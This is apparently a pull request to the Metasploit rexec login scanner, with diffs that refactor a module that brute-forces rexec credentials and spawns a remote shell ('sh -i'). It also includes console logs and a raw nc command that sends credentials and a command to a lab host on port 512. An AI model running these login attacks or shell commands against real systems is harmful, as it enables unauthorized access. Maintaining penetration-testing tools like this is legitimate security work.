### PR TITLE
rexec_login improvements

### DIFF
--- a/modules/auxiliary/scanner/rservices/rexec_login.rb
+++ b/modules/auxiliary/scanner/rservices/rexec_login.rb
@@ -124,6 +124,8 @@ class MetasploitModule < Msf::Auxiliary
   # rescue ::Exception
   #  print_error("#{$!}")
   # return :abort
+  rescue ::EOFError
+    return :failed
   ensure
     disconnect
   end

--- a/modules/auxiliary/scanner/rservices/rexec_login.rb
+++ b/modules/auxiliary/scanner/rservices/rexec_login.rb
@@ -80,17 +80,29 @@ class MetasploitModule < Msf::Auxiliary
       stderr_sock = nil
     end
 
+    # Get the first byte
+    buf = sock.get_once(1) || ''
+
     # NOTE: We report this here, since we are awfully convinced now that this is really
     # an rexec service
-    report_service(
-      host: rhost,
+    service_data = {
+      address: rhost,
       port: rport,
-      proto: 'tcp',
-      name: 'exec'
+      # exec (IANA) != rexec (Protocol) --- https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=512
+      service_name: 'exec',
+      proof: buf,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    report_service(
+      host: service_data[:address],
+      port: service_data[:port],
+      proto: service_data[:protocol],
+      name: service_data[:service_name]
     )
 
     # Read the expected null byte response
-    buf = sock.get_once(1) || ''
     if buf != "\x00"
       buf = sock.get_once(-1) || ''
       vprint_error("Result: #{buf.gsub(/[[:space:]]+/, ' ')}")
@@ -99,7 +111,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # Should we report a vuln here? rexec allowed w/o password?!
     print_good("#{target_host}:#{rport}, rexec #{user}:#{pass}")
-    start_rexec_session(rhost, rport, user, pass, buf, stderr_sock)
+    start_rexec_session(service_data[:address], service_data[:port], user, pass, stderr_sock, service_data)
 
     return :next_user
   # For debugging only
@@ -150,16 +162,7 @@ class MetasploitModule < Msf::Auxiliary
     sd
   end
 
-  def start_rexec_session(host, port, user, pass, proof, stderr_sock)
-    service_data = {
-      address: host,
-      port: port,
-      service_name: 'exec',
-      proof: proof,
-      protocol: 'tcp',
-      workspace_id: myworkspace_id
-    }
-
+  def start_rexec_session(host, port, user, pass, stderr_sock, service_data)
     credential_data = {
       module_fullname: fullname,
       origin_type: :service,

--- a/modules/auxiliary/scanner/rservices/rexec_login.rb
+++ b/modules/auxiliary/scanner/rservices/rexec_login.rb
@@ -102,10 +102,18 @@ class MetasploitModule < Msf::Auxiliary
       name: service_data[:service_name]
     )
 
-    # Read the expected null byte response
+    # The expected response is a null byte
     if buf != "\x00"
+      # Get everything else
       buf = sock.get_once(-1) || ''
-      vprint_error("Result: #{buf.gsub(/[[:space:]]+/, ' ')}")
+      vprint_error("Result: #{buf.gsub(/[[:space:]]+/, ' ')}") unless buf.empty?
+      # "Where are you" happens with rexecd in netkit-rsh v0.17
+      if buf.include?('Where are you?')
+        print_error("#{target_host}:#{rport} - The rexecd service could not resolve a hostname for #{Rex::Socket.source_address(target_host)}. Ensure a reverse DNS (PTR) record exists for your attacking host.")
+        # Stop, isn't any point going forwards
+        return :abort
+      end
+      # Bad login
       return :failed
     end
 

--- a/modules/auxiliary/scanner/rservices/rexec_login.rb
+++ b/modules/auxiliary/scanner/rservices/rexec_login.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
       },
       'References' => [
         [ 'CVE', '1999-0651' ],
-        [ 'CVE', '1999-0502'] # Weak password
+        [ 'CVE', '1999-0502' ] # Weak password
       ],
       'Author' => [ 'jduck' ],
       'License' => MSF_LICENSE
@@ -43,23 +43,21 @@ class MetasploitModule < Msf::Auxiliary
 
     if datastore['ENABLE_STDERR']
       # For each host, bind a privileged listening port for the target to connect
-      # back to.
+      # back to
       ret = listen_on_random_port(datastore['STDERR_PORT'])
-      if not ret
-        return :abort
-      end
+      return :abort if !ret
 
       sd, stderr_port = ret
     else
       sd = stderr_port = nil
     end
 
-    # The maximum time for a host is set here.
-    Timeout.timeout(300) {
-      each_user_pass { |user, pass|
+    # The maximum time for a host is set here
+    Timeout.timeout(300) do
+      each_user_pass do |user, pass|
         do_login(user, pass, sd, stderr_port)
-      }
-    }
+      end
+    end
 
     sd.close if sd
   end
@@ -70,12 +68,12 @@ class MetasploitModule < Msf::Auxiliary
     cmd = datastore['CMD']
     cmd ||= 'sh -i 2>&1'
 
-    # We must connect from a privileged port.
-    return :abort if not connect
+    # We must connect from a privileged port
+    return :abort if !connect
 
     sock.put("#{stderr_port}\x00#{user}\x00#{pass}\x00#{cmd}\x00")
 
-    if sfd and stderr_port
+    if sfd && stderr_port
       stderr_sock = sfd.accept
       add_socket(stderr_sock)
     else
@@ -83,34 +81,33 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     # NOTE: We report this here, since we are awfully convinced now that this is really
-    # an rexec service.
+    # an rexec service
     report_service(
-      :host => rhost,
-      :port => rport,
-      :proto => 'tcp',
-      :name => 'exec'
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: 'exec'
     )
 
-    # Read the expected nul byte response.
+    # Read the expected null byte response
     buf = sock.get_once(1) || ''
     if buf != "\x00"
-      buf = sock.get_once(-1) || ""
+      buf = sock.get_once(-1) || ''
       vprint_error("Result: #{buf.gsub(/[[:space:]]+/, ' ')}")
       return :failed
     end
 
-    # should we report a vuln here? rexec allowed w/o password?!
+    # Should we report a vuln here? rexec allowed w/o password?!
     print_good("#{target_host}:#{rport}, rexec '#{user}' : '#{pass}'")
     start_rexec_session(rhost, rport, user, pass, buf, stderr_sock)
 
     return :next_user
-
-  # For debugging only.
+  # For debugging only
   # rescue ::Exception
   #  print_error("#{$!}")
   # return :abort
   ensure
-    disconnect()
+    disconnect
   end
 
   #
@@ -123,16 +120,16 @@ class MetasploitModule < Msf::Auxiliary
       sd = listen_on_port(stderr_port)
     else
       stderr_port = 1024 + rand(0x10000 - 1024)
-      512.times {
+      512.times do
         sd = listen_on_port(stderr_port)
         break if sd
 
         stderr_port = 1024 + rand(0x10000 - 1024)
-      }
+      end
     end
 
-    if not sd
-      print_error("Unable to bind to listener port")
+    if !sd
+      print_error('Unable to bind to listener port')
       return false
     end
 
@@ -142,7 +139,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def listen_on_port(stderr_port)
-    vprint_status("Trying to listen on port #{stderr_port} ..")
+    vprint_status("Trying to listen on port #{stderr_port}")
     sd = nil
     begin
       sd = Rex::Socket.create_tcp_server('LocalPort' => stderr_port)
@@ -164,7 +161,7 @@ class MetasploitModule < Msf::Auxiliary
     }
 
     credential_data = {
-      module_fullname: self.fullname,
+      module_fullname: fullname,
       origin_type: :service,
       username: user,
       # Save a reference to the socket so we don't GC prematurely
@@ -177,9 +174,9 @@ class MetasploitModule < Msf::Auxiliary
     }.merge(service_data)
 
     if datastore['CreateSession']
-      start_session(self, "rexec #{user}:#{pass} (#{host}:#{port})", login_data, false, self.sock)
+      start_session(self, "rexec #{user}:#{pass} (#{host}:#{port})", login_data, false, sock)
       # Don't tie the life of this socket to the exploit
-      self.sockets.delete(stderr_sock)
+      sockets.delete(stderr_sock)
       self.sock = nil
     end
   end

--- a/modules/auxiliary/scanner/rservices/rexec_login.rb
+++ b/modules/auxiliary/scanner/rservices/rexec_login.rb
@@ -16,10 +16,9 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name' => 'rexec Authentication Scanner',
       'Description' => %q{
-          This module will test an rexec service on a range of machines and
-        report successful logins.
-
-        NOTE: This module requires access to bind to privileged ports (below 1024).
+        This module will test a range of machines for a Remote EXECution (REXEC)
+        service (part of the r-commands suite) and report successful logins,
+        optionally attempt to spawn a session.
       },
       'References' => [
         [ 'CVE', '1999-0651' ],
@@ -42,8 +41,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status("#{ip}:#{rport} - Starting rexec sweep")
 
     if datastore['ENABLE_STDERR']
-      # For each host, bind a privileged listening port for the target to connect
-      # back to
+      # Bind a local port for the target(s) to connect back to for stderr
       ret = listen_on_random_port(datastore['STDERR_PORT'])
       return :abort if !ret
 

--- a/modules/auxiliary/scanner/rservices/rexec_login.rb
+++ b/modules/auxiliary/scanner/rservices/rexec_login.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def do_login(user, pass, sfd, stderr_port)
-    vprint_status("#{target_host}:#{rport} - Attempting rexec with username:password '#{user}':'#{pass}'")
+    vprint_status("#{target_host}:#{rport} - Attempting rexec with #{user}:#{pass}")
 
     cmd = datastore['CMD']
     cmd ||= 'sh -i 2>&1'
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     # Should we report a vuln here? rexec allowed w/o password?!
-    print_good("#{target_host}:#{rport}, rexec '#{user}' : '#{pass}'")
+    print_good("#{target_host}:#{rport}, rexec #{user}:#{pass}")
     start_rexec_session(rhost, rport, user, pass, buf, stderr_sock)
 
     return :next_user
@@ -129,17 +129,17 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if !sd
-      print_error('Unable to bind to listener port')
+      print_error("Unable to bind to listener port: #{stderr_port}/TCP")
       return false
     end
 
     add_socket(sd)
-    print_status("Listening on port #{stderr_port}")
+    print_status("Listening on port #{stderr_port}/TCP")
     [ sd, stderr_port ]
   end
 
   def listen_on_port(stderr_port)
-    vprint_status("Trying to listen on port #{stderr_port}")
+    vprint_status("Trying to listen on port #{stderr_port}/TCP")
     sd = nil
     begin
       sd = Rex::Socket.create_tcp_server('LocalPort' => stderr_port)

--- a/modules/auxiliary/scanner/rservices/rexec_login.rb
+++ b/modules/auxiliary/scanner/rservices/rexec_login.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name' => 'rexec Authentication Scanner',
       'Description' => %q{
-        This module will test a range of machines for a Remote EXECution (REXEC)
+        This module will test a range of machines for a remote execution (rexec)
         service (part of the r-commands suite) and report successful logins,
         optionally attempt to spawn a session.
       },
@@ -37,8 +37,8 @@ class MetasploitModule < Msf::Auxiliary
     )
   end
 
-  def run_host(ip)
-    print_status("#{ip}:#{rport} - Starting rexec sweep")
+  def run_host(_ip)
+    print_status('Starting rexec sweep')
 
     if datastore['ENABLE_STDERR']
       # Bind a local port for the target(s) to connect back to for stderr
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def do_login(user, pass, sfd, stderr_port)
-    vprint_status("#{target_host}:#{rport} - Attempting rexec with #{user}:#{pass}")
+    vprint_status("rexec - Attempting: #{user}:#{pass}")
 
     cmd = datastore['CMD']
     cmd ||= 'sh -i 2>&1'
@@ -105,9 +105,9 @@ class MetasploitModule < Msf::Auxiliary
       # Get everything else
       buf = sock.get_once(-1) || ''
       vprint_error("Result: #{buf.gsub(/[[:space:]]+/, ' ')}") unless buf.empty?
-      # "Where are you" happens with rexecd in netkit-rsh v0.17
+      # "Where are you" happens with rexecd in netkit-rsh v0.17 when it fails to-do a rDNS
       if buf.include?('Where are you?')
-        print_error("#{target_host}:#{rport} - The rexecd service could not resolve a hostname for #{Rex::Socket.source_address(target_host)}. Ensure a reverse DNS (PTR) record exists for your attacking host.")
+        print_error("The rexecd service could not resolve a hostname for #{Rex::Socket.source_address(target_host)}. Ensure a reverse DNS (PTR) record exists for your attacking host.")
         # Stop, isn't any point going forwards
         return :abort
       end
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     # Should we report a vuln here? rexec allowed w/o password?!
-    print_good("#{target_host}:#{rport}, rexec #{user}:#{pass}")
+    print_good("rexec successful login: #{user}:#{pass}")
     start_rexec_session(service_data[:address], service_data[:port], user, pass, stderr_sock, service_data)
 
     return :next_user


### PR DESCRIPTION
This PR is for

- Able to be more verbose
- Clean up output (e.g. remove duplicated IP:PORT, creds format etc)
- Check if rDNS is missing
- Update module description

## Before

```console
[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: OYGIkFxA.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
msf > use auxiliary/scanner/rservices/rexec_login
msf auxiliary(scanner/rservices/rexec_login) > options

Module options (auxiliary/scanner/rservices/rexec_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   CreateSession     true             no        Create a new session for every successful login
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   ENABLE_STDERR     false            yes       Enables connecting the stderr port
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS            10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             512              yes       The target port (TCP)
   STDERR_PORT                        no        The port to listen on for stderr
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - 10.0.0.10:512 - Starting rexec sweep
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > set USERNAME msfadmin
USERNAME => msfadmin
msf auxiliary(scanner/rservices/rexec_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - 10.0.0.10:512 - Starting rexec sweep
[*] 10.0.0.10:512         - 10.0.0.10:512 - Attempting rexec with username:password 'msfadmin':'msfadmin'
[+] 10.0.0.10:512         - 10.0.0.10:512, rexec 'msfadmin' : 'msfadmin'
[*] Command shell session 1 opened (10.0.0.1:43005 -> 10.0.0.10:512) at 2026-04-23 17:07:43 +0100
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >
```

## After

```console
msf auxiliary(scanner/rservices/rexec_login) > reload
[*] Reloading module...
msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - Starting rexec sweep
[*] 10.0.0.10:512         - 10.0.0.10:512         - Skipping stderr call back
[*] 10.0.0.10:512         - 10.0.0.10:512         - [1/2] - Attempting rexec with msfadmin:msfadmin
[+] 10.0.0.10:512         - rexec successful login: msfadmin:msfadmin
[*] Command shell session 2 opened (10.0.0.1:39301 -> 10.0.0.10:512) at 2026-04-23 17:13:03 +0100
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >
```

- - - 

## rDNS issue

```console
$ sudo killall dnsmasq
$ sudo dnsmasq --interface=tap0 --bind-interfaces --dhcp-range=10.0.0.2,10.0.0.10,12h
$
$ { printf '0\0msfadmin\0msfadmin\0id\0'; sleep 2; } | nc 10.0.0.10 512
Where are you?
$
$ sudo killall dnsmasq
$ sudo dnsmasq --interface=tap0 --bind-interfaces --dhcp-range=10.0.0.2,10.0.0.10,12h --host-record=attacker,10.0.0.1
$
$ ssh1 msfadmin@10.0.0.10 sudo reboot -f
/etc/ssh/ssh_config line 52: Unsupported option "gssapiauthentication"
msfadmin@10.0.0.10's password:
[sudo] password for msfadmin: msfadmin
$
$ { printf '0\0msfadmin\0msfadmin\0id\0'; sleep 2; } | nc 10.0.0.10 512
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
$
```

```console
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - Starting rexec sweep
[*] 10.0.0.10:512         - Skipping stderr call back
[*] 10.0.0.10:512         - Attempting rexec with msfadmin:msfadmin
[-] 10.0.0.10:512         - Result: Where are you?
[-] 10.0.0.10:512         - The rexecd service could not resolve a hostname for 10.0.0.1. Ensure a reverse DNS (PTR) record exists for your attacking host.
[-] 10.0.0.10:512         - 10.0.0.10:512         - [1/2] - Bruteforce cancelled against this service.
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >
```